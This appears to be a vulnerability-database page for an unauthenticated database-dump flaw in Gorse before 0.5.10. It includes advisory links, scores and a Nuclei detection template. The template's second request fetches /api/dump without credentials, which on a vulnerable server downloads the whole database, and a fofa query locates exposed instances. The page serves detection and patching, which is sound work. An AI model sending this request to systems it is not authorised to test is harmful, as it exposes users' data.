Gorse < 0.5.10 - Unauthenticated Database Dump

04 Jul 2026 03:00:48 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Gorse before 0.5.10 allows unauthenticated access to the /api/dump and /api/restore endpoints when admin_api_key is empty.

Related

Reporter | Title | Published | Family
GithubExploit | Exploit for CVE-2026-56782 | 2 Jul 2026 23:12 | githubexploit
GithubExploit | Exploit for CVE-2026-56782 | 29 Jun 2026 22:09 | githubexploit
ATTACKERKB | CVE-2026-56782 | 29 Jun 2026 17:16 | attackerkb
Circl | CVE-2026-56782 | 29 Jun 2026 18:34 | circl
CVE | CVE-2026-56782 | 29 Jun 2026 17:16 | cve
Cvelist | CVE-2026-56782 Gorse - Unauthenticated Database Dump and Restore via /api/dump and /api/restore Endpoints | 29 Jun 2026 17:16 | cvelist
EUVD | EUVD-2026-40158 | 29 Jun 2026 17:16 | euvd
NVD | CVE-2026-56782 | 29 Jun 2026 18:16 | nvd
Positive Technologies | PT-2026-53659 | 29 Jun 2026 00:00 | ptsecurity
Vulnrichment | CVE-2026-56782 Gorse - Unauthenticated Database Dump and Restore via /api/dump and /api/restore Endpoints | 29 Jun 2026 17:16 | vulnrichment

id: CVE-2026-56782

info:
  name: Gorse < 0.5.10 - Unauthenticated Database Dump
  author: 0x_Akoko
  severity: critical
  description: |
    Gorse < 0.5.10 contains an authentication bypass caused by empty admin_api_key in /api/dump and /api/restore endpoints, letting unauthenticated remote attackers access and modify protected data, exploit requires default empty admin_api_key configuration.
  impact: |
    Remote attackers can exfiltrate or overwrite the entire database including sensitive user data without authentication.
  remediation: |
    Update to version 0.5.10 or later.
  reference:
    - https://github.com/gorse-io/gorse/issues/1292
    - https://nvd.nist.gov/vuln/detail/CVE-2026-56782
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-56782
    epss-score: 0.03016
    epss-percentile: 0.85797
    cwe-id: CWE-306
  metadata:
    max-request: 2
    verified: true
    vendor: gorse-io
    product: gorse
    fofa-query: title="Gorse Dashboard"
  tags: cve,cve2026,gorse,unauth,exposure,misconfig

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(tolower(body), "gorse")
        condition: and
        internal: true

  - raw:
      - |
        GET /api/dump HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, "application/octet-stream")
          - "!contains(body, 'unauthorized')"
        condition: and
# digest: 4a0a00473045022100b94280bed5e639f2edf3b62d2c808883d8a1150adca0e2e8e120a97560f1c9dd0220738cf76a05a78c8246f7d7aca74726400e4486f03b233c2b0495b6d4384301f5:922c64590222798bb761d5b6d8e72950

Scores (current as of 01 Jul 2026 02:53)
Vulners AI Score: 6 (Medium risk)
CVSS 4: 9.3
CVSS 3.1: 9.8
EPSS: 0.03016